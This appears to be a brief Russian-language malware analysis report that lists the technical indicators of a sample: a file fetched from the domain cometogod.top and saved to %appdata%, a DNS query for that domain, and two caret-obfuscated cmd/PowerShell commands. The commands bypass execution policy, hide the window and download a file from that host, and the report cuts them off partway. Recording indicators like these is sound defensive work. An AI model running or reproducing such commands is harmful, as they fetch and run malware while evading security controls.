Техническая информация
- http://cometogod.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWe^rShe^lL^.EXE^ -e^xecU^tIO^nPO^lI^c^y^ bYP^ass -N^Op^ROf^i^L^e -WIndoWS^TYLE hiDDen (^Ne^w^-o^b^Je^CT^ ^Sy^Ste^M^.net^.w^EBCLI^E^N^T^).do^WNl^Oa^dFile(^'http://cometogod.top/...
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /c "POWe^rShe^lL^.EXE^ -e^xecU^tIO^nPO^lI^c^y^ bYP^ass -N^Op^ROf^i^L^e -WIndoWS^TYLE hiDDen (^Ne^w^-o^b^Je^CT^ ^Sy^Ste^M^.net^.w^EBCLI^E^N^T^).do^WNl^Oa^dFile(^'http://cometogod.top/...' (со скрытым окном)